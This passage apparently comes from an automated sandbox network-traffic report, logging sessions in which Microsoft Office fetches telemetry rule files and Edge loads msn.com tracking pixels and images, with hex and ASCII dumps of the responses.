"e1686078d1b60d351da5a87543a2a663", "value": 7.50665524262551 }, { "key": "3a3417f5f20a03a98973689887fb72a2", "value": -1.74922517642794 }, {
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 62 30 64 61 32 37 35 35 32 30 39 31 38 65 32 33 64 64 36 31 35 65 32 61 37 34 37 35 32 38 66 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 39 37 36 31 34 30 37 39 32 39 31 35 33 37 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 66 61 62 31 62 61 38 63 36 37 63 37 63 38 33 38 64 62 39 38 64 36 36 36 66 30 32 61 31 33 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 31 31 37 38 37 35 38 36 30 34 35 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a Data Ascii: { "key": "b0da275520918e23dd615e2a747528f1", "value": -0.976140792915373 }, { "key": "cfab1ba8c67c7c838db98d666f02a132", "value": -1.11787586045094 },
2024-11-10 03:55:26 UTC	16053	IN	Data Raw: 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 64 65 39 35 62 34 33 62 63 65 65 62 34 62 39 39 38 61 65 64 34 61 65 64 35 63 65 66 31 61 65 37 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 33 33 31 39 35 35 36 37 30 31 31 37 37 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 61 64 64 65 63 34 32 36 39 33 32 65 37 31 33 32 33 37 30 30 61 66 61 31 39 31 31 66 38 66 31 63 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 30 2e 31 36 30 39 38 34 33 32 38 39 38 35 39 32 34 0d Data Ascii: }, { "key": "de95b43bceeb4b998aed4aed5cef1ae7", "value": -1.03319556701177 }, { "key": "addec426932e71323700afa1911f8f1c", "value": 0.160984328985924

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.5	49860	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:25 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:26 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:25 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: be5f4e21-901e-008f-2e7f-3267a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035525Z-17df447cdb59mt7dhC1DFWqpg400000008eg000000005g2p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:26 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.5	49866	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:25 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:26 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:26 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: fb68cf1d-a01e-001e-3b01-2d49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035526Z-16547b76f7flf9g6hC1DFWmcx800000002gg00000000t07s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:26 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	49868	20.125.209.212	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:26 UTC	1271	OUT	GET /c.gif?rnd=1731210922530&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=1b1c38cab0134bc7a8e603f795c6d608&activityId=1b1c38cab0134bc7a8e603f795c6d608&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=7D43837CDE984B5C93357FDF0CAA9AAC&MUID=1C457A5C69C96D7328066F6F68476CEB HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=1C457A5C69C96D7328066F6F68476CEB; _EDGE_S=F=1&SID=04348CE3E2B16FF0131799D0E3856EA1; _EDGE_V=1; SM=T; _C_ETH=1
2024-11-10 03:55:26 UTC	983	IN	HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: image/gif Last-Modified: Wed, 16 Oct 2024 06:33:28 GMT Accept-Ranges: bytes ETag: "b116c54f951fdb1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=1C457A5C69C96D7328066F6F68476CEB; domain=.msn.com; expires=Fri, 05-Dec-2025 03:55:26 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: SRM_M=1C457A5C69C96D7328066F6F68476CEB; domain=c.msn.com; expires=Fri, 05-Dec-2025 03:55:26 GMT; path=/; SameSite=None; Secure; Set-Cookie: MR=0; domain=c.msn.com; expires=Sun, 17-Nov-2024 03:55:26 GMT; path=/; SameSite=None; Secure; Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Sun, 10-Nov-2024 04:05:26 GMT; path=/; SameSite=None; Secure; Date: Sun, 10 Nov 2024 03:55:25 GMT Connection: close Content-Length: 42
2024-11-10 03:55:26 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b Data Ascii: GIF89a!,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	49869	23.192.223.200	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:26 UTC	634	OUT	GET /tenant/amp/entityid/AA12sf7A.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:26 UTC	521	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Tue, 29 Oct 2024 13:09:36 GMT X-Datacenter: eastap X-ActivityId: 71bf84f9-d0c2-4597-9893-d34df3f39f2d Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA12sf7A X-Source-Length: 114962 Content-Length: 114962 Cache-Control: public, max-age=205989 Expires: Tue, 12 Nov 2024 13:08:35 GMT Date: Sun, 10 Nov 2024 03:55:26 GMT Connection: close
2024-11-10 03:55:26 UTC	15863	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: 85 da a2 66 d0 8a a6 2d 98 a6 2f 2d 29 89 be 4e 39 24 9e 3c ca c9 6c 03 84 93 dc b9 27 52 75 44 2e 13 33 10 2e 9d 07 af 45 54 38 c5 fd ca e3 2b a2 e5 30 72 b2 4e 32 06 5a 5d 46 06 20 9e a8 4b 44 d3 0b 39 00 9c 91 42 d3 cd 94 78 b4 e5 29 18 34 d8 bf 6e 2a 3c ee 90 16 0a 2e a6 49 37 12 50 5a f0 e3 74 81 04 cd a6 ca 63 78 c9 f2 f4 aa c1 b8 6e 6f c1 04 64 99 c6 4c 77 fa 85 91 06 66 51 24 60 8c c5 af 19 81 9f 72 98 67 ec 48 18 55 cd a0 8b e8 79 1f 4a bb 3d a0 70 81 c6 75 31 fb ca 63 81 85 00 09 c9 5d 6b 0e 86 fe 2a 40 08 9b 22 66 4f 72 b0 01 1c e7 8a 08 04 6c 6d e7 dd e0 af b1 92 09 fa 41 f0 ee 40 b1 c2 d5 dc 61 a4 99 e5 de a6 ac 00 25 b2 1d 88 0c 18 6f 8a 22 79 8e 00 1b a6 01 4a b3 58 d9 91 7d 33 45 27 64 23 d1 cd 05 c4 d3 0b 63 3c a1 49 0d 73 b0 91 11 88 88 Data Ascii: f-/-)N9$<l'RuD.3.ET8+0rN2Z]F KD9Bx)4n<.I7PZtcxnodLwfQ$`rgHUyJ=pu1c]k@"fOrlmA@a%o"yJX}3E'd#c<Is
2024-11-10 03:55:26 UTC	1275	IN	Data Raw: ca b9 d5 e8 5a 7c d1 4d ed 0a 3b a6 09 1a eb a0 e4 93 89 78 90 60 f0 c5 88 0e 90 a5 56 6a 51 92 95 42 e6 90 73 d2 f9 4c cf ad d5 37 ba 41 92 48 cb 90 27 8f 44 e9 6b 10 72 89 95 a6 d5 0e 7e fc 37 3d 6d 1d 17 01 c6 09 37 ce 07 ee b3 9a 7a 3b 62 32 54 4b 9a ef 4d 86 1d ba 6c 75 13 9c 6b af 92 e6 31 c1 d2 0c 93 63 33 6b c4 dc e4 bc f9 87 4c c3 ae 26 ec ee b6 49 6c 88 06 77 b5 b7 13 75 83 50 82 44 18 eb 3e 07 db 79 58 44 5f e4 d3 0c 59 a2 2f 2e 36 c7 b2 d4 a1 5f 11 20 b0 b1 d7 16 f2 3e c2 57 4f b4 69 19 4c 67 98 10 23 28 0b d3 fa 8f a8 a7 7b 66 29 b4 c4 c4 c6 5d 9c de 76 1b 3c 9f a6 fa 6a b6 37 a6 ab c5 51 31 31 97 9e 8f 56 ed ba 8d 2a e0 87 b1 ae 74 49 91 7f 11 07 c5 5d 63 59 04 e4 64 4c 9e 47 5c 93 a3 77 73 6f 3a 2a 98 8e df db 46 13 76 7b 9b 5b 7b 99 57 44 Data Ascii: Z\|M;x`VjQBsL7AH'Dkr~7=m7z;b2TKMluk1c3kL&IlwuPD>yXD_Y/.6_ >WOiLg#({f)]v<j7Q11VtI]cYdLG\wso:Fv{[{WD
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: 78 cb b7 35 dd 82 1c 23 29 c2 73 e4 42 f4 1f a3 01 9f f3 00 e8 9c 25 b7 81 d0 c6 57 57 b7 46 17 17 7d b9 cb c9 e7 c6 4f 6a 7e 9f 6b fa bc de 79 b5 6a 16 d2 70 73 41 76 36 43 80 c9 96 90 40 99 8b 66 ba 6f d9 a6 06 36 4c 9e cc 16 3b 78 ea 1b 06 c7 42 bd 5b 6b e9 e2 e3 a2 ba e7 37 8f 7b c4 3a f7 28 a2 9c a2 ea 58 2a 16 e2 c3 48 88 06 77 b5 31 26 f7 b8 5d 1a 75 b1 61 a2 f7 34 c0 c8 b6 1b 8b 16 2c a4 92 78 18 85 d9 cb 36 33 7b 65 ab 96 c7 95 f9 39 58 1a c6 b8 96 50 24 5f 0e 07 3a 47 59 85 dd ec e8 b6 71 35 87 98 2e 6e 9d 4f a1 6f e6 e5 c5 b9 da 9f 25 fe 2e 19 71 7d b1 06 e3 73 77 48 c3 70 2c 2f 7e e5 ba b5 a8 3a ab 9b 4d a4 01 68 2e b9 e7 70 7e 2b a6 c7 4c 4d b3 41 4c c2 6a 8c ec 89 6c 83 95 da 65 b9 09 47 ea 19 d8 ba 99 a4 d7 17 38 1c 52 0c 5a 22 e3 da 92 ed Data Ascii: x5#)sB%WWF}Oj~kyjpsAv6C@fo6L;xB[k7{:(X*Hw1&]ua4,x63{e9XP$_:GYq5.nOo%.q}swHp,/~:Mh.p~+LMALjleG8RZ"
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: 50 56 79 c7 fc 76 3f 76 10 e9 04 5b ee 2b b3 ba e6 de 9a e2 78 c4 39 3b c6 35 53 31 cd c8 1b 38 12 5a 5e ec 24 8c 25 b8 26 38 19 32 17 66 a8 a7 8d 80 54 37 9b b4 36 d8 44 df 3c d7 36 0e dd 5d 73 69 98 ce 1d 18 9c b1 7b 4e 4f 1d 50 b8 61 73 88 68 78 c4 2f 98 98 f8 af 45 b4 ff 00 08 66 4f b3 a6 5a dc a3 96 57 e0 bc fc a2 6c ec ae 6d 6b 5b c1 db 69 73 d3 9d f5 84 bb 0b c8 a3 9f cc ef 8a e7 53 ac 69 1c 00 18 18 9c 72 32 0e 5c c4 67 2a 36 e2 f1 3d ac e9 dc 8a 66 5a 55 3a 76 7e e2 69 99 85 05 a5 ea 07 ce 82 42 60 02 4d 00 18 42 00 01 09 80 0d 08 00 04 d2 33 01 09 00 66 92 01 03 42 46 0c 21 23 20 10 91 98 34 92 00 1a 48 00 1a 48 06 4d 2c a4 66 46 92 01 91 a1 00 03 51 39 e1 b6 cc a4 53 36 36 b4 51 8b b0 aa 18 55 cd 4b c9 ee d6 fd 16 5b 93 68 ed 67 33 9e 6d 36 69 Data Ascii: PVyv?v[+x9;5S18Z^$%&82fT76D<6]si{NOPashx/EfOZWlmk[isSir2\g*6=fZU:v~iB`MB3fBF!# 4HHM,fFQ9S66QUK[hg3m6i
2024-11-10 03:55:26 UTC	7952	IN	Data Raw: 99 de f5 63 6b 11 56 b6 1c 50 da 8e 1c be eb 67 a6 4b 48 9c a3 b1 e7 ce f4 44 cc 5f 4f d9 cb 86 73 7a 34 6c cc d3 4c db 5b 4f 9b 86 03 9a 29 b4 8c 98 5a 6f ae 8b 4e 04 d4 63 65 db d1 7d 78 9d 38 2e dc 50 f3 27 7b f1 99 bb 1a 28 98 88 7a 94 ed 7e 51 0f 1f 56 db 70 ff 00 f2 b3 d8 ba 95 ff 00 1f 5e 9e d1 da 4b 63 10 70 92 6f e5 aa f5 ef 7a 7d 1e 5d 3f 57 44 d3 69 89 bd bd b8 bc 8b 5a b8 ed 87 a5 57 d2 d5 8f 14 4c 5a eb cf 2f c5 46 1b 3f cd 4e 71 5a 05 ee 32 ba ee 56 d8 aa 06 d2 30 e7 61 2c aa ec 22 cd 05 da 98 cb aa ed a6 a8 89 9c f8 3c 8a 37 a6 6a d3 2f 97 d9 cd bb 4d 53 46 9c 7f 67 a5 b9 4d 38 27 3c f3 8b 65 9c c4 67 6e aa db 67 e3 a8 ed 8f 6b aa 76 80 b4 16 8c 24 0b 1f f6 95 5f f2 9f 92 ab b1 55 63 58 da 6e 0e 61 76 f0 33 20 c6 84 2f 66 2b 98 65 44 62 8e Data Ascii: ckVPgKHD_Osz4lL[O)ZoNce}x8.P'{(z~QVp^Kcpoz}]?WDiZWLZ/F?NqZ2V0a,"<7j/MSFgM8'<egngkv$_UcXnav3 /f+eDb
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: 33 39 b8 58 6b 99 8a 75 38 7d be a6 cb a9 b4 d4 0d a0 d0 c8 00 cd c3 89 cb 47 5e e0 9e 37 55 74 ca 22 e5 33 2e 40 d9 6b 97 0e d1 ae 6f 00 73 3d c2 55 16 ed 55 41 8c 6e 23 84 9f 7a bb a5 36 93 bb a4 ea 55 40 24 b1 d8 8d a3 80 d2 14 4c da ea c0 69 27 94 ba c3 ce 02 24 8c ee a6 dd 96 b6 6e 63 b8 1b 1f 8e 41 5c a7 55 c4 61 c5 79 bc 62 93 c3 5c ba a1 49 b2 b8 70 6e 9e c8 e6 dd c0 5f 2b 80 07 43 af 35 97 b0 01 8d ef c4 ec 80 cc 47 8d d1 06 8b 05 a6 8b 61 0e 64 1b b8 3b 29 bc 09 12 4b 6c 0e 97 55 08 0e 69 2d 37 91 ca c7 92 19 dc 58 dd ea 1b 39 22 ce 61 13 25 d3 00 18 81 ba eb c4 c0 c8 ae 76 cc e7 d3 99 0e 01 ce ee 83 20 83 f1 e6 9c c5 c1 40 5c da 36 0d a5 d4 de e6 35 93 4a 0b 9a c2 71 83 f5 b4 44 75 32 6c 17 42 96 d8 29 d5 63 e6 03 9b 84 c4 e6 04 72 d2 ca 62 95 Data Ascii: 39Xku8}G^7Ut"3.@kos=UUAn#z6U@$Li'$ncA\Uayb\Ipn_+C5Gad;)KlUi-7X9"a%v @\65JqDu2lB)crb
2024-11-10 03:55:26 UTC	7678	IN	Data Raw: 99 5a 41 18 66 53 40 00 a5 08 06 45 74 d0 0c 89 08 06 09 34 00 19 4d 00 02 42 08 c0 42 00 04 84 00 64 84 00 02 10 0c 89 34 ac 15 72 24 5d 2b 1a ae 92 4d 2b 05 5c 89 09 03 19 04 5d 05 99 9e 41 24 8e f2 71 25 68 08 41 5e 4c 5a 02 68 06 02 69 17 aa a0 e2 39 1a d0 05 08 99 e6 a8 5c 44 f4 48 13 01 4c a6 65 ac 2e 21 b0 8e f4 a5 12 a8 5c 43 48 84 e5 9c c9 aa cd 26 13 96 61 49 47 54 81 09 4d 93 2a 83 84 81 c4 6b 92 cd b5 f0 ba ce aa 62 44 b5 a6 a9 8e 25 16 eb 0e 95 2a 84 98 97 47 af 82 cd 1f e8 90 46 51 3e 2b 83 72 88 b1 ee f6 bd 2d aa e6 e5 b3 9f 07 6e 9b 6a 3e e4 34 5b 22 ef fb 6e 7d aa 16 64 08 02 da 48 69 f0 8f 89 0b cb aa 68 8d 2f af 4f ba aa f6 ca ef 5a 8c 73 ad b4 d2 ff 00 64 53 ed c1 d6 8d a1 b1 21 90 23 ea f3 b1 52 53 63 dd 20 b4 81 c9 cd 3e be 6b 8f f0 Data Ascii: ZAfS@Et4MBBd4r$]+M+\]A$q%hA^LZhi9\DHLe.!\CH&aIGTMkbD%GFQ>+r-nj>4["n}dHih/OZsdS!#RSc >k
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: e6 89 8e c4 e4 44 2c 62 12 aa 0e d2 92 bc 30 61 68 e0 f5 95 69 fc 92 32 01 c0 28 9c fa 6d d3 e2 9d a6 55 14 d7 25 74 4d 54 c2 6e d3 af 9a ab da d3 e1 e6 a3 07 63 6c 15 f5 f0 56 26 3d e5 2b 06 b7 22 ab 76 d4 e3 ed 1e 3e 95 9c 6d 73 86 bd dd 7f 17 83 49 af 94 b2 ef 28 e9 e2 1d 50 9c 9b e6 a1 ed 86 98 53 8a 2d c5 78 3b 44 d5 3d 19 f7 91 c8 a5 dc 21 46 6a 0e 2d 0a b2 3c 3d a2 f3 d1 13 5c 75 88 49 9a 83 b5 6f d4 10 bc 3c 96 c7 bc 8e b0 9e ea be 36 f1 27 c5 66 d2 d2 df 36 18 a3 aa c9 55 71 83 c5 66 d2 cd e5 86 28 e6 b8 d1 ce 14 2d a8 df ee f2 f2 58 d5 d9 75 4d 33 c9 d5 4f 6b 3a 6b 8e 6e e5 30 5c 06 44 f2 6f a1 55 a6 e1 a3 dd e4 bc bd c9 88 9e 9d b3 fa b7 ae 99 f8 61 eb 6d c6 2e 93 3c a3 f4 61 45 51 f1 4b d4 d2 15 4e 78 47 3e ee 17 bc 2e 4b 1c e9 90 5c 6f c4 89 Data Ascii: D,b0ahi2(mU%tMTnclV&=+"v>msI(PS-x;D=!Fj-<=\uIo<6'f6Uqf(-XuM3Ok:kn0\DoUam.<aEQKNxG>.K\o
2024-11-10 03:55:26 UTC	274	IN	Data Raw: 9e 12 a3 fc b3 90 f1 0b a3 d9 70 00 78 fb 97 4f e1 cf ca 5c 98 fa fe ce 5f cf 97 9c 3b 7b be 96 8f 35 2c 35 8f af a1 75 3b 23 1a fa f7 2e 9b ed c3 87 1b 96 db 92 ef c1 da e4 f6 4f 39 fa f9 2e bf 66 07 cc 7a 5d 77 e3 a5 e7 e2 9e 90 f3 fb ba a7 57 a3 82 3a cb 8e 69 bb 30 0f 8a ec 76 6d cf dc bd 08 aa 38 d9 e7 e3 97 9b 34 55 c2 25 e9 e0 8d 5c 57 34 6b 3d fe 92 bb 78 63 82 f4 a2 67 85 9e 6e 27 95 31 1c 6e f5 6c f3 f0 d1 a4 9e 6d 5d 8c 18 89 d3 9a f5 af 3d 7c 5e 6e 2b 73 78 d6 8e 9e 0f 57 05 de 75 cd 2e d3 d7 a2 ee 16 8d 23 af ad d7 b3 15 5b 8b c9 8a bb 7b 1e 15 54 e2 e0 f6 26 98 e5 da f3 dd 91 1f b7 bd 76 1f 4d a5 7b 38 e1 e6 53 5c bc 29 db 7a d5 6d c4 b8 64 70 bf 72 e8 3a 97 00 7a 95 eb 5d c3 15 f5 f2 78 d3 0f 42 aa 3a 79 b9 8a d1 66 79 fa f4 5d cc 22 a7 9b Data Ascii: pxO\_;{5,5u;#.O9.fz]wW:i0vm84U%\W4k=xcgn'1nlm]=\|^n+sxWu.#[{T&vM{8S\)zmdpr:z]xB:yfy]"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	49870	23.192.223.200	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:26 UTC	634	OUT	GET /tenant/amp/entityid/AA11MZ4M.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:26 UTC	520	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Wed, 06 Nov 2024 00:56:26 GMT X-Datacenter: eastap X-ActivityId: ec5b56f3-1a3a-4614-99eb-3ac802eb1108 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA11MZ4M X-Source-Length: 114527 Content-Length: 114527 Cache-Control: public, max-age=75580 Expires: Mon, 11 Nov 2024 00:55:06 GMT Date: Sun, 10 Nov 2024 03:55:26 GMT Connection: close
